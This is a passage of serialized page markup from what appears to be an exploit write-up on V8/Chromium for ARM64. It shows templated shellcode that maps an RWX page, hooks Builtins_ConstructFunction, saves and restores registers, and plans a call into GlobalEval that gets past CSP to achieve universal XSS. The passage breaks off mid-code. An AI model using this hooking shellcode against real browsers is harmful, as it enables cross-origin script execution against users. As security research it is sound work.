x5\n",{"type":28,"tag":116,"props":139327,"children":139328},{"class":245,"line":1212},[139329],{"type":28,"tag":116,"props":139330,"children":139331},{"emptyLinePlaceholder":19},[139332],{"type":33,"value":1044},{"type":28,"tag":116,"props":139334,"children":139335},{"class":245,"line":1254},[139336],{"type":28,"tag":116,"props":139337,"children":139338},{},[139339],{"type":33,"value":139340},"// mmap RWX for jump dest (uxss_sc)\n",{"type":28,"tag":116,"props":139342,"children":139343},{"class":245,"line":1262},[139344],{"type":28,"tag":116,"props":139345,"children":139346},{},[139347],{"type":33,"value":139348},"mov x0, #0\n",{"type":28,"tag":116,"props":139350,"children":139351},{"class":245,"line":1294},[139352],{"type":28,"tag":116,"props":139353,"children":139354},{},[139355],{"type":33,"value":139356},"mov x1, #0x1000\n",{"type":28,"tag":116,"props":139358,"children":139359},{"class":245,"line":1334},[139360],{"type":28,"tag":116,"props":139361,"children":139362},{},[139363],{"type":33,"value":139294},{"type":28,"tag":116,"props":139365,"children":139366},{"class":245,"line":1372},[139367],{"type":28,"tag":116,"props":139368,"children":139369},{},[139370],{"type":33,"value":139371},"mov x3, #34\n",{"type":28,"tag":116,"props":139373,"children":139374},{"class":245,"line":1381},[139375],{"type":28,"tag":116,"props":139376,"children":139377},{},[139378],{"type":33,"value":139379},"mov x4, #-1\n",{"type":28,"tag":116,"props":139381,"children":139382},{"class":245,"line":1389},[139383],{"type":28,"tag":116,"props":139384,"children":139385},{},[139386],{"type":33,"value":139387},"mov x5, #0\n",{"type":28,"tag":116,"props":139389,"children":139390},{"class":245,"line":1425},[139391],{"type":28,"tag":116,"props":139392,"children":139393},{},[139394],{"type":33,"value":139395},"mov x8, #222\n",{"type":28,"tag":116,"props":139397,"children":139398},{"class":245,"line":1448},[139399],{"type":28,"tag":116,"props":139400,"children":139401},{},[139402],{"type":33,"value":139310},{"type":28,"tag":116,"props":139404,"children":139405},{"class":245,"line":1456},[139406],{"type":28,"tag":116,"props":139407,"children":139408},{"emptyLinePlaceholder":19},[139409],{"type":33,"value":1044},{"type":28,"tag":116,"props":139411,"children":139412},{"class":245,"line":1520},[139413],{"type":28,"tag":116,"props":139414,"children":139415},{},[139416],{"type":33,"value":139208},{"type":28,"tag":116,"props":139418,"children":139419},{"class":245,"line":1580},[139420],{"type":28,"tag":116,"props":139421,"children":139422},{"emptyLinePlaceholder":19},[139423],{"type":33,"value":1044},{"type":28,"tag":116,"props":139425,"children":139426},{"class":245,"line":1620},[139427],{"type":28,"tag":116,"props":139428,"children":139429},{},[139430],{"type":33,"value":139431},"// at this point:\n",{"type":28,"tag":116,"props":139433,"children":139434},{"class":245,"line":1668},[139435],{"type":28,"tag":116,"props":139436,"children":139437},{},[139438],{"type":33,"value":139439},"// x6 = Builtins_ConstructFunction\n",{"type":28,"tag":116,"props":139441,"children":139442},{"class":245,"line":1677},[139443],{"type":28,"tag":116,"props":139444,"children":139445},{},[139446],{"type":33,"value":139447},"// x5 = mmap page for uxss_sc\n",{"type":28,"tag":116,"props":139449,"children":139450},{"class":245,"line":1685},[139451],{"type":28,"tag":116,"props":139452,"children":139453},{"emptyLinePlaceholder":19},[139454],{"type":33,"value":1044},{"type":28,"tag":116,"props":139456,"children":139457},{"class":245,"line":1729},[139458],{"type":28,"tag":116,"props":139459,"children":139460},{},[139461],{"type":33,"value":139462},"// write uxss_sc to mmaped rwx page\n",{"type":28,"tag":116,"props":139464,"children":139465},{"class":245,"line":1764},[139466],{"type":28,"tag":116,"props":139467,"children":139468},{},[139469],{"type":33,"value":139470},"{write_sc(uxss_sc, \"x5\")}\n",{"type":28,"tag":116,"props":139472,"children":139473},{"class":245,"line":1896},[139474],{"type":28,"tag":116,"props":139475,"children":139476},{"emptyLinePlaceholder":19},[139477],{"type":33,"value":1044},{"type":28,"tag":116,"props":139479,"children":139480},{"class":245,"line":1932},[139481],{"type":28,"tag":116,"props":139482,"children":139483},{},[139484],{"type":33,"value":139485},"// wipe from cache\n",{"type":28,"tag":116,"props":139487,"children":139488},{"class":245,"line":1940},[139489],{"type":28,"tag":116,"props":139490,"children":139491},{},[139492],{"type":33,"value":139493},"mov x0, x5\n",{"type":28,"tag":116,"props":139495,"children":139496},{"class":245,"line":1948},[139497],{"type":28,"tag":116,"props":139498,"children":139499},{},[139500],{"type":33,"value":139501},"{WIPE_CACHE}\n",{"type":28,"tag":116,"props":139503,"children":139504},{"class":245,"line":1957},[139505],{"type":28,"tag":116,"props":139506,"children":139507},{"emptyLinePlaceholder":19},[139508],{"type":33,"value":1044},{"type":28,"tag":116,"props":139510,"children":139511},{"class":245,"line":1970},[139512],{"type":28,"tag":116,"props":139513,"children":139514},{},[139515],{"type":33,"value":139516},"// patch Builtins_ConstructFunction\n",{"type":28,"tag":116,"props":139518,"children":139519},{"class":245,"line":1987},[139520],{"type":28,"tag":116,"props":139521,"children":139522},{},[139523],{"type":33,"value":139524},"{write_sc(new_compile_instrs, \"x6\")}\n",{"type":28,"tag":116,"props":139526,"children":139527},{"class":245,"line":2003},[139528],{"type":28,"tag":116,"props":139529,"children":139530},{},[139531],{"type":33,"value":139532},"// and add a pointer to uxss_sc just above new instructions\n",{"type":28,"tag":116,"props":139534,"children":139535},{"class":245,"line":31949},[139536],{"type":28,"tag":116,"props":139537,"children":139538},{},[139539],{"type":33,"value":139540},"str x5, [x6, #{5 * INSTR_SIZE}]\n",{"type":28,"tag":116,"props":139542,"children":139543},{"class":245,"line":80570},[139544],{"type":28,"tag":116,"props":139545,"children":139546},{"emptyLinePlaceholder":19},[139547],{"type":33,"value":1044},{"type":28,"tag":116,"props":139549,"children":139550},{"class":245,"line":80583},[139551],{"type":28,"tag":116,"props":139552,"children":139553},{},[139554],{"type":33,"value":139485},{"type":28,"tag":116,"props":139556,"children":139557},{"class":245,"line":80591},[139558],{"type":28,"tag":116,"props":139559,"children":139560},{},[139561],{"type":33,"value":139562},"mov x0, x6\n",{"type":28,"tag":116,"props":139564,"children":139565},{"class":245,"line":80599},[139566],{"type":28,"tag":116,"props":139567,"children":139568},{},[139569],{"type":33,"value":139501},{"type":28,"tag":29,"props":139571,"children":139572},{},[139573,139575,139581,139583,139588,139590,139596],{"type":33,"value":139574},"In the snippet above, ",{"type":28,"tag":98,"props":139576,"children":139578},{"className":139577},[],[139579],{"type":33,"value":139580},"new_compile_instrs",{"type":33,"value":139582}," refers to the instructions written to the beginning of ",{"type":28,"tag":98,"props":139584,"children":139586},{"className":139585},[],[139587],{"type":33,"value":139079},{"type":33,"value":139589}," that invoke the ",{"type":28,"tag":98,"props":139591,"children":139593},{"className":139592},[],[139594],{"type":33,"value":139595},"uxss_sc",{"type":33,"value":139597}," mmap-ed shellcode:",{"type":28,"tag":234,"props":139599,"children":139601},{"code":139600,"language":139132,"meta":7,"className":139133,"style":7},"bti c\n\n// store registers that will be overwritten\nstp x15, lr, [sp, #-16]!\n\n// get current rip into x15\nadr x15, .\n\n// load the uxss_sc pointer saved just above new instructions\nldr x15, [x15, #{3 * INSTR_SIZE}]\n\n// jump to uxss_sc\nblr x15\n",[139602],{"type":28,"tag":98,"props":139603,"children":139604},{"__ignoreMap":7},[139605,139613,139620,139628,139636,139643,139651,139659,139666,139674,139682,139689,139697],{"type":28,"tag":116,"props":139606,"children":139607},{"class":245,"line":246},[139608],{"type":28,"tag":116,"props":139609,"children":139610},{},[139611],{"type":33,"value":139612},"bti c\n",{"type":28,"tag":116,"props":139614,"children":139615},{"class":245,"line":256},[139616],{"type":28,"tag":116,"props":139617,"children":139618},{"emptyLinePlaceholder":19},[139619],{"type":33,"value":1044},{"type":28,"tag":116,"props":139621,"children":139622},{"class":245,"line":293},[139623],{"type":28,"tag":116,"props":139624,"children":139625},{},[139626],{"type":33,"value":139627},"// store registers that will be overwritten\n",{"type":28,"tag":116,"props":139629,"children":139630},{"class":245,"line":361},[139631],{"type":28,"tag":116,"props":139632,"children":139633},{},[139634],{"type":33,"value":139635},"stp x15, lr, [sp, #-16]!\n",{"type":28,"tag":116,"props":139637,"children":139638},{"class":245,"line":387},[139639],{"type":28,"tag":116,"props":139640,"children":139641},{"emptyLinePlaceholder":19},[139642],{"type":33,"value":1044},{"type":28,"tag":116,"props":139644,"children":139645},{"class":245,"line":400},[139646],{"type":28,"tag":116,"props":139647,"children":139648},{},[139649],{"type":33,"value":139650},"// get current rip into x15\n",{"type":28,"tag":116,"props":139652,"children":139653},{"class":245,"line":614},[139654],{"type":28,"tag":116,"props":139655,"children":139656},{},[139657],{"type":33,"value":139658},"adr x15, .\n",{"type":28,"tag":116,"props":139660,"children":139661},{"class":245,"line":631},[139662],{"type":28,"tag":116,"props":139663,"children":139664},{"emptyLinePlaceholder":19},[139665],{"type":33,"value":1044},{"type":28,"tag":116,"props":139667,"children":139668},{"class":245,"line":665},[139669],{"type":28,"tag":116,"props":139670,"children":139671},{},[139672],{"type":33,"value":139673},"// load the uxss_sc pointer saved just above new instructions\n",{"type":28,"tag":116,"props":139675,"children":139676},{"class":245,"line":713},[139677],{"type":28,"tag":116,"props":139678,"children":139679},{},[139680],{"type":33,"value":139681},"ldr x15, [x15, #{3 * INSTR_SIZE}]\n",{"type":28,"tag":116,"props":139683,"children":139684},{"class":245,"line":750},[139685],{"type":28,"tag":116,"props":139686,"children":139687},{"emptyLinePlaceholder":19},[139688],{"type":33,"value":1044},{"type":28,"tag":116,"props":139690,"children":139691},{"class":245,"line":779},[139692],{"type":28,"tag":116,"props":139693,"children":139694},{},[139695],{"type":33,"value":139696},"// jump to uxss_sc\n",{"type":28,"tag":116,"props":139698,"children":139699},{"class":245,"line":796},[139700],{"type":28,"tag":116,"props":139701,"children":139702},{},[139703],{"type":33,"value":139704},"blr x15\n",{"type":28,"tag":29,"props":139706,"children":139707},{},[139708,139713,139715,139720],{"type":28,"tag":98,"props":139709,"children":139711},{"className":139710},[],[139712],{"type":33,"value":139595},{"type":33,"value":139714}," is the mmap-ed shellcode invoked by the patched ",{"type":28,"tag":98,"props":139716,"children":139718},{"className":139717},[],[139719],{"type":33,"value":139079},{"type":33,"value":139721}," to execute our XSS payload. Its prologue looks like this:",{"type":28,"tag":234,"props":139723,"children":139725},{"code":139724,"language":139132,"meta":7,"className":139133,"style":7},"bti c\n\n// Save full register context\nstp x0,  x1,  [sp, #-16]!\nstp x2,  x3,  [sp, #-16]!\nstp x4,  x5,  [sp, #-16]!\nstp x6,  x7,  [sp, #-16]!\nstp x8,  x9,  [sp, #-16]!\nstp x10, x11, [sp, #-16]!\nstp x12, x13, [sp, #-16]!\nstp x14, x15, [sp, #-16]!\nstp x16, x17, [sp, #-16]!\nstp x18, x19, [sp, #-16]!\nstp x20, x21, [sp, #-16]!\nstp x22, x23, [sp, #-16]!\nstp x24, x25, [sp, #-16]!\nstp x26, x27, [sp, #-16]!\nstp x28, x29, [sp, #-16]!\nstr lr, [sp, #-16]!\n",[139726],{"type":28,"tag":98,"props":139727,"children":139728},{"__ignoreMap":7},[139729,139736,139743,139751,139759,139767,139775,139783,139791,139799,139807,139815,139823,139831,139839,139847,139855,139863,139871],{"type":28,"tag":116,"props":139730,"children":139731},{"class":245,"line":246},[139732],{"type":28,"tag":116,"props":139733,"children":139734},{},[139735],{"type":33,"value":139612},{"type":28,"tag":116,"props":139737,"children":139738},{"class":245,"line":256},[139739],{"type":28,"tag":116,"props":139740,"children":139741},{"emptyLinePlaceholder":19},[139742],{"type":33,"value":1044},{"type":28,"tag":116,"props":139744,"children":139745},{"class":245,"line":293},[139746],{"type":28,"tag":116,"props":139747,"children":139748},{},[139749],{"type":33,"value":139750},"// Save full register context\n",{"type":28,"tag":116,"props":139752,"children":139753},{"class":245,"line":361},[139754],{"type":28,"tag":116,"props":139755,"children":139756},{},[139757],{"type":33,"value":139758},"stp x0,  x1,  [sp, #-16]!\n",{"type":28,"tag":116,"props":139760,"children":139761},{"class":245,"line":387},[139762],{"type":28,"tag":116,"props":139763,"children":139764},{},[139765],{"type":33,"value":139766},"stp x2,  x3,  [sp, #-16]!\n",{"type":28,"tag":116,"props":139768,"children":139769},{"class":245,"line":400},[139770],{"type":28,"tag":116,"props":139771,"children":139772},{},[139773],{"type":33,"value":139774},"stp x4,  x5,  [sp, #-16]!\n",{"type":28,"tag":116,"props":139776,"children":139777},{"class":245,"line":614},[139778],{"type":28,"tag":116,"props":139779,"children":139780},{},[139781],{"type":33,"value":139782},"stp x6,  x7,  [sp, #-16]!\n",{"type":28,"tag":116,"props":139784,"children":139785},{"class":245,"line":631},[139786],{"type":28,"tag":116,"props":139787,"children":139788},{},[139789],{"type":33,"value":139790},"stp x8,  x9,  [sp, #-16]!\n",{"type":28,"tag":116,"props":139792,"children":139793},{"class":245,"line":665},[139794],{"type":28,"tag":116,"props":139795,"children":139796},{},[139797],{"type":33,"value":139798},"stp x10, x11, [sp, #-16]!\n",{"type":28,"tag":116,"props":139800,"children":139801},{"class":245,"line":713},[139802],{"type":28,"tag":116,"props":139803,"children":139804},{},[139805],{"type":33,"value":139806},"stp x12, x13, [sp, #-16]!\n",{"type":28,"tag":116,"props":139808,"children":139809},{"class":245,"line":750},[139810],{"type":28,"tag":116,"props":139811,"children":139812},{},[139813],{"type":33,"value":139814},"stp x14, x15, [sp, #-16]!\n",{"type":28,"tag":116,"props":139816,"children":139817},{"class":245,"line":779},[139818],{"type":28,"tag":116,"props":139819,"children":139820},{},[139821],{"type":33,"value":139822},"stp x16, x17, [sp, #-16]!\n",{"type":28,"tag":116,"props":139824,"children":139825},{"class":245,"line":796},[139826],{"type":28,"tag":116,"props":139827,"children":139828},{},[139829],{"type":33,"value":139830},"stp x18, x19, [sp, #-16]!\n",{"type":28,"tag":116,"props":139832,"children":139833},{"class":245,"line":847},[139834],{"type":28,"tag":116,"props":139835,"children":139836},{},[139837],{"type":33,"value":139838},"stp x20, x21, [sp, #-16]!\n",{"type":28,"tag":116,"props":139840,"children":139841},{"class":245,"line":898},[139842],{"type":28,"tag":116,"props":139843,"children":139844},{},[139845],{"type":33,"value":139846},"stp x22, x23, [sp, #-16]!\n",{"type":28,"tag":116,"props":139848,"children":139849},{"class":245,"line":907},[139850],{"type":28,"tag":116,"props":139851,"children":139852},{},[139853],{"type":33,"value":139854},"stp x24, x25, [sp, #-16]!\n",{"type":28,"tag":116,"props":139856,"children":139857},{"class":245,"line":981},[139858],{"type":28,"tag":116,"props":139859,"children":139860},{},[139861],{"type":33,"value":139862},"stp x26, x27, [sp, #-16]!\n",{"type":28,"tag":116,"props":139864,"children":139865},{"class":245,"line":1011},[139866],{"type":28,"tag":116,"props":139867,"children":139868},{},[139869],{"type":33,"value":139870},"stp x28, x29, [sp, #-16]!\n",{"type":28,"tag":116,"props":139872,"children":139873},{"class":245,"line":1029},[139874],{"type":28,"tag":116,"props":139875,"children":139876},{},[139877],{"type":33,"value":139878},"str lr, [sp, #-16]!\n",{"type":28,"tag":29,"props":139880,"children":139881},{},[139882],{"type":33,"value":139883},"All registers are saved to the stack because we don't know which registers may be clobbered by functions invoked later.",{"type":28,"tag":29,"props":139885,"children":139886},{},[139887,139889,139894],{"type":33,"value":139888},"The epilogue restores all saved registers, restores the original instructions in ",{"type":28,"tag":98,"props":139890,"children":139892},{"className":139891},[],[139893],{"type":33,"value":139079},{"type":33,"value":139895},", and then returns execution to its beginning:",{"type":28,"tag":234,"props":139897,"children":139899},{"code":139898,"language":139132,"meta":7,"className":139133,"style":7},"// restore original instructions of Builtins_ConstructFunction\nldr lr, [sp], #16\n// move lr to the beginning of Builtins_ConstructFunction\nsub lr, lr, #{5 * INSTR_SIZE}\n{write_sc(orig_compile_instrs, \"lr\")}\n\n// wipe from cache\nmov x0, lr\n{WIPE_CACHE}\n\n// restore original registers\nldp x28, x29, [sp], #16\nldp x26, x27, [sp], #16\nldp x24, x25, [sp], #16\nldp x22, x23, [sp], #16\nldp x20, x21, [sp], #16\nldp x18, x19, [sp], #16\nldp x16, x17, [sp], #16\nldp x14, x15, [sp], #16\nldp x12, x13, [sp], #16\nldp x10, x11, [sp], #16\nldp x8,  x9,  [sp], #16\nldp x6,  x7,  [sp], #16\nldp x4,  x5,  [sp], #16\nldp x2,  x3,  [sp], #16\nldp x0,  x1,  [sp], #16\n\n// Builtins_ConstructFunction doesnt care about x4 and overwrites\n// it immediately, so we can clobber and use it as a return register.\n// This is done so lr isnt clobbered and ConstructFunction knows\n// where to return\nmov x4, lr\n\n// x15 and lr were saved in patched Builtins_ConstructFunction\nldp x15, lr, [sp], #16\n\nret x4\n",[139900],{"type":28,"tag":98,"props":139901,"children":139902},{"__ignoreMap":7},[139903,139911,139919,139927,139935,139943,139950,139957,139965,139972,139979,139987,139995,140003,140011,140019,140027,140035,140043,140051,140059,140067,140075,140083,140091,140099,140107,140114,140122,140130,140138,140146,140154,140161,140169,140177,140184],{"type":28,"tag":116,"props":139904,"children":139905},{"class":245,"line":246},[139906],{"type":28,"tag":116,"props":139907,"children":139908},{},[139909],{"type":33,"value":139910},"// restore original instructions of Builtins_ConstructFunction\n",{"type":28,"tag":116,"props":139912,"children":139913},{"class":245,"line":256},[139914],{"type":28,"tag":116,"props":139915,"children":139916},{},[139917],{"type":33,"value":139918},"ldr lr, [sp], #16\n",{"type":28,"tag":116,"props":139920,"children":139921},{"class":245,"line":293},[139922],{"type":28,"tag":116,"props":139923,"children":139924},{},[139925],{"type":33,"value":139926},"// move lr to the beginning of Builtins_ConstructFunction\n",{"type":28,"tag":116,"props":139928,"children":139929},{"class":245,"line":361},[139930],{"type":28,"tag":116,"props":139931,"children":139932},{},[139933],{"type":33,"value":139934},"sub lr, lr, #{5 * INSTR_SIZE}\n",{"type":28,"tag":116,"props":139936,"children":139937},{"class":245,"line":387},[139938],{"type":28,"tag":116,"props":139939,"children":139940},{},[139941],{"type":33,"value":139942},"{write_sc(orig_compile_instrs, \"lr\")}\n",{"type":28,"tag":116,"props":139944,"children":139945},{"class":245,"line":400},[139946],{"type":28,"tag":116,"props":139947,"children":139948},{"emptyLinePlaceholder":19},[139949],{"type":33,"value":1044},{"type":28,"tag":116,"props":139951,"children":139952},{"class":245,"line":614},[139953],{"type":28,"tag":116,"props":139954,"children":139955},{},[139956],{"type":33,"value":139485},{"type":28,"tag":116,"props":139958,"children":139959},{"class":245,"line":631},[139960],{"type":28,"tag":116,"props":139961,"children":139962},{},[139963],{"type":33,"value":139964},"mov x0, lr\n",{"type":28,"tag":116,"props":139966,"children":139967},{"class":245,"line":665},[139968],{"type":28,"tag":116,"props":139969,"children":139970},{},[139971],{"type":33,"value":139501},{"type":28,"tag":116,"props":139973,"children":139974},{"class":245,"line":713},[139975],{"type":28,"tag":116,"props":139976,"children":139977},{"emptyLinePlaceholder":19},[139978],{"type":33,"value":1044},{"type":28,"tag":116,"props":139980,"children":139981},{"class":245,"line":750},[139982],{"type":28,"tag":116,"props":139983,"children":139984},{},[139985],{"type":33,"value":139986},"// restore original registers\n",{"type":28,"tag":116,"props":139988,"children":139989},{"class":245,"line":779},[139990],{"type":28,"tag":116,"props":139991,"children":139992},{},[139993],{"type":33,"value":139994},"ldp x28, x29, [sp], #16\n",{"type":28,"tag":116,"props":139996,"children":139997},{"class":245,"line":796},[139998],{"type":28,"tag":116,"props":139999,"children":140000},{},[140001],{"type":33,"value":140002},"ldp x26, x27, [sp], #16\n",{"type":28,"tag":116,"props":140004,"children":140005},{"class":245,"line":847},[140006],{"type":28,"tag":116,"props":140007,"children":140008},{},[140009],{"type":33,"value":140010},"ldp x24, x25, [sp], #16\n",{"type":28,"tag":116,"props":140012,"children":140013},{"class":245,"line":898},[140014],{"type":28,"tag":116,"props":140015,"children":140016},{},[140017],{"type":33,"value":140018},"ldp x22, x23, [sp], #16\n",{"type":28,"tag":116,"props":140020,"children":140021},{"class":245,"line":907},[140022],{"type":28,"tag":116,"props":140023,"children":140024},{},[140025],{"type":33,"value":140026},"ldp x20, x21, [sp], #16\n",{"type":28,"tag":116,"props":140028,"children":140029},{"class":245,"line":981},[140030],{"type":28,"tag":116,"props":140031,"children":140032},{},[140033],{"type":33,"value":140034},"ldp x18, x19, [sp], #16\n",{"type":28,"tag":116,"props":140036,"children":140037},{"class":245,"line":1011},[140038],{"type":28,"tag":116,"props":140039,"children":140040},{},[140041],{"type":33,"value":140042},"ldp x16, x17, [sp], #16\n",{"type":28,"tag":116,"props":140044,"children":140045},{"class":245,"line":1029},[140046],{"type":28,"tag":116,"props":140047,"children":140048},{},[140049],{"type":33,"value":140050},"ldp x14, x15, [sp], #16\n",{"type":28,"tag":116,"props":140052,"children":140053},{"class":245,"line":1038},[140054],{"type":28,"tag":116,"props":140055,"children":140056},{},[140057],{"type":33,"value":140058},"ldp x12, x13, [sp], #16\n",{"type":28,"tag":116,"props":140060,"children":140061},{"class":245,"line":1047},[140062],{"type":28,"tag":116,"props":140063,"children":140064},{},[140065],{"type":33,"value":140066},"ldp x10, x11, [sp], #16\n",{"type":28,"tag":116,"props":140068,"children":140069},{"class":245,"line":1071},[140070],{"type":28,"tag":116,"props":140071,"children":140072},{},[140073],{"type":33,"value":140074},"ldp x8,  x9,  [sp], #16\n",{"type":28,"tag":116,"props":140076,"children":140077},{"class":245,"line":1137},[140078],{"type":28,"tag":116,"props":140079,"children":140080},{},[140081],{"type":33,"value":140082},"ldp x6,  x7,  [sp], #16\n",{"type":28,"tag":116,"props":140084,"children":140085},{"class":245,"line":1181},[140086],{"type":28,"tag":116,"props":140087,"children":140088},{},[140089],{"type":33,"value":140090},"ldp x4,  x5,  [sp], #16\n",{"type":28,"tag":116,"props":140092,"children":140093},{"class":245,"line":1212},[140094],{"type":28,"tag":116,"props":140095,"children":140096},{},[140097],{"type":33,"value":140098},"ldp x2,  x3,  [sp], #16\n",{"type":28,"tag":116,"props":140100,"children":140101},{"class":245,"line":1254},[140102],{"type":28,"tag":116,"props":140103,"children":140104},{},[140105],{"type":33,"value":140106},"ldp x0,  x1,  [sp], #16\n",{"type":28,"tag":116,"props":140108,"children":140109},{"class":245,"line":1262},[140110],{"type":28,"tag":116,"props":140111,"children":140112},{"emptyLinePlaceholder":19},[140113],{"type":33,"value":1044},{"type":28,"tag":116,"props":140115,"children":140116},{"class":245,"line":1294},[140117],{"type":28,"tag":116,"props":140118,"children":140119},{},[140120],{"type":33,"value":140121},"// Builtins_ConstructFunction doesnt care about x4 and overwrites\n",{"type":28,"tag":116,"props":140123,"children":140124},{"class":245,"line":1334},[140125],{"type":28,"tag":116,"props":140126,"children":140127},{},[140128],{"type":33,"value":140129},"// it immediately, so we can clobber and use it as a return register.\n",{"type":28,"tag":116,"props":140131,"children":140132},{"class":245,"line":1372},[140133],{"type":28,"tag":116,"props":140134,"children":140135},{},[140136],{"type":33,"value":140137},"// This is done so lr isnt clobbered and ConstructFunction knows\n",{"type":28,"tag":116,"props":140139,"children":140140},{"class":245,"line":1381},[140141],{"type":28,"tag":116,"props":140142,"children":140143},{},[140144],{"type":33,"value":140145},"// where to return\n",{"type":28,"tag":116,"props":140147,"children":140148},{"class":245,"line":1389},[140149],{"type":28,"tag":116,"props":140150,"children":140151},{},[140152],{"type":33,"value":140153},"mov x4, lr\n",{"type":28,"tag":116,"props":140155,"children":140156},{"class":245,"line":1425},[140157],{"type":28,"tag":116,"props":140158,"children":140159},{"emptyLinePlaceholder":19},[140160],{"type":33,"value":1044},{"type":28,"tag":116,"props":140162,"children":140163},{"class":245,"line":1448},[140164],{"type":28,"tag":116,"props":140165,"children":140166},{},[140167],{"type":33,"value":140168},"// x15 and lr were saved in patched Builtins_ConstructFunction\n",{"type":28,"tag":116,"props":140170,"children":140171},{"class":245,"line":1456},[140172],{"type":28,"tag":116,"props":140173,"children":140174},{},[140175],{"type":33,"value":140176},"ldp x15, lr, [sp], #16\n",{"type":28,"tag":116,"props":140178,"children":140179},{"class":245,"line":1520},[140180],{"type":28,"tag":116,"props":140181,"children":140182},{"emptyLinePlaceholder":19},[140183],{"type":33,"value":1044},{"type":28,"tag":116,"props":140185,"children":140186},{"class":245,"line":1580},[140187],{"type":28,"tag":116,"props":140188,"children":140189},{},[140190],{"type":33,"value":140191},"ret x4\n",{"type":28,"tag":29,"props":140193,"children":140194},{},[140195,140197,140202,140204,140209,140211,140217],{"type":33,"value":140196},"At this point, we have successfully hooked ",{"type":28,"tag":98,"props":140198,"children":140200},{"className":140199},[],[140201],{"type":33,"value":139079},{"type":33,"value":140203}," and can execute arbitrary shellcode whenever it is invoked from within the ",{"type":28,"tag":98,"props":140205,"children":140207},{"className":140206},[],[140208],{"type":33,"value":139595},{"type":33,"value":140210}," body. For our purposes, we want to evaluate an arbitrary JavaScript string to achieve UXSS, and the first function we examined for this was ",{"type":28,"tag":98,"props":140212,"children":140214},{"className":140213},[],[140215],{"type":33,"value":140216},"Builtins_GlobalEval",{"type":33,"value":141},{"type":28,"tag":29,"props":140219,"children":140220},{},[140221,140226,140228,140233,140235,140240],{"type":28,"tag":98,"props":140222,"children":140224},{"className":140223},[],[140225],{"type":33,"value":140216},{"type":33,"value":140227}," takes a single ",{"type":28,"tag":98,"props":140229,"children":140231},{"className":140230},[],[140232],{"type":33,"value":47551},{"type":33,"value":140234}," argument that it evaluates. However, it comes with some complications. One notable issue is that it checks whether the Content Security Policy (CSP) allows the use of ",{"type":28,"tag":98,"props":140236,"children":140238},{"className":140237},[],[140239],{"type":33,"value":37171},{"type":33,"value":4160},{"type":28,"tag":234,"props":140242,"children":140244},{"code":140243,"language":28767,"meta":7,"className":28765,"style":7},"BUILTIN(GlobalEval) {\n  [...]\n\n  if (!Builtins::AllowDynamicFunction(isolate, target, target_global_proxy)) {\n    isolate->CountUsage(v8::Isolate::kFunctionConstructorReturnedUndefined);\n    return ReadOnlyRoots(isolate).undefined_value();\n  }\n",[140245],{"type":28,"tag":98,"props":140246,"children":140247},{"__ignoreMap":7},[140248,140261,140268,140275,140318,140340,140366],{"type":28,"tag":116,"props":140249,"children":140250},{"class":245,"line":246},[140251,140256],{"type":28,"tag":116,"props":140252,"children":140253},{"style":282},[140254],{"type":33,"value":140255},"BUILTIN",{"type":28,"tag":116,"props":140257,"children":140258},{"style":266},[140259],{"type":33,"value":140260},"(GlobalEval) {\n",{"type":28,"tag":116,"props":140262,"children":140263},{"class":245,"line":256},[140264],{"type":28,"tag":116,"props":140265,"children":140266},{"style":266},[140267],{"type":33,"value":126766},{"type":28,"tag":116,"props":140269,"children":140270},{"class":245,"line":293},[140271],{"type":28,"tag":116,"props":140272,"children":140273},{"emptyLinePlaceholder":19},[140274],{"type":33,"value":1044},{"type":28,"tag":116,"props":140276,"children":140277},{"class":245,"line":361},[140278,140283,140288,140292,140297,140301,140305,140309,140314],{"type":28,"tag":116,"props":140279,"children":140280},{"style":266},[140281],{"type":33,"value":140282},"  if (!Builtins::",{"type":28,"tag":116,"props":140284,"children":140285},{"style":339},[140286],{"type":33,"value":140287},"AllowDynamicFunction",{"type":28,"tag":116,"props":140289,"children":140290},{"style":266},[140291],{"type":33,"value":313},{"type":28,"tag":116,"props":140293,"children":140294},{"style":339},[140295],{"type":33,"value":140296},"isolate",{"type":28,"tag":116,"props":140298,"children":140299},{"style":266},[140300],{"type":33,"value":825},{"type":28,"tag":116,"props":140302,"children":140303},{"style":339},[140304],{"type":33,"value":114691},{"type":28,"tag":116,"props":140306,"children":140307},{"style":266},[140308],{"type":33,"value":825},{"type":28,"tag":116,"props":140310,"children":140311},{"style":339},[140312],{"type":33,"value":140313},"target_global_proxy",{"type":28,"tag":116,"props":140315,"children":140316},{"style":266},[140317],{"type":33,"value":34820},{"type":28,"tag":116,"props":140319,"children":140320},{"class":245,"line":387},[140321,140326,140330,140335],{"type":28,"tag":116,"props":140322,"children":140323},{"style":272},[140324],{"type":33,"value":140325},"    isolate",{"type":28,"tag":116,"props":140327,"children":140328},{"style":266},[140329],{"type":33,"value":13423},{"type":28,"tag":116,"props":140331,"children":140332},{"style":282},[140333],{"type":33,"value":140334},"CountUsage",{"type":28,"tag":116,"props":140336,"children":140337},{"style":266},[140338],{"type":33,"value":140339},"(v8::Isolate::kFunctionConstructorReturnedUndefined);\n",{"type":28,"tag":116,"props":140341,"children":140342},{"class":245,"line":400},[140343,140347,140352,140357,140362],{"type":28,"tag":116,"props":140344,"children":140345},{"style":260},[140346],{"type":33,"value":393},{"type":28,"tag":116,"props":140348,"children":140349},{"style":282},[140350],{"type":33,"value":140351}," ReadOnlyRoots",{"type":28,"tag":116,"props":140353,"children":140354},{"style":266},[140355],{"type":33,"value":140356},"(isolate).",{"type":28,"tag":116,"props":140358,"children":140359},{"style":282},[140360],{"type":33,"value":140361},"undefined_value",{"type":28,"tag":116,"props":140363,"children":140364},{"style":266},[140365],{"type":33,"value":1445},{"type":28,"tag":116,"props":140367,"children":140368},{"class":245,"line":614},[140369],{"type":28,"tag":116,"props":140370,"children":140371},{"style":266},[140372],{"type":33,"value":5543},{"type":28,"tag":29,"props":140374,"children":140375},{},[140376,140378,140383],{"type":33,"value":140377},"This means we would need to patch the function further to ensure it never enters this ",{"type":28,"tag":98,"props":140379,"children":140381},{"className":140380},[],[140382],{"type":33,"value":263},{"type":33,"value":140384}," block.",{"type":28,"tag":29,"props":140386,"children":140387},{},[140388],{"type":33,"value":140389},"Alternatively, we could replicate the calls made once the security checks pass:",{"type":28,"tag":234,"props":140391,"children":140393},{"code":140392,"language":28767,"meta":7,"className":28765,"style":7},"BUILTIN(GlobalEval) {\n\n  [...]\n\n  DirectHandle\u003CJSFunction> function;\n  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(\n      isolate, function,\n      Compiler::GetFunctionFromValidatedString(\n          direct_handle(target->native_context(), isolate), source,\n          NO_PARSE_RESTRICTION, kNoSourcePosition));\n  RETURN_RESULT_OR_FAILURE(\n      isolate, Execution::Call(isolate, function, 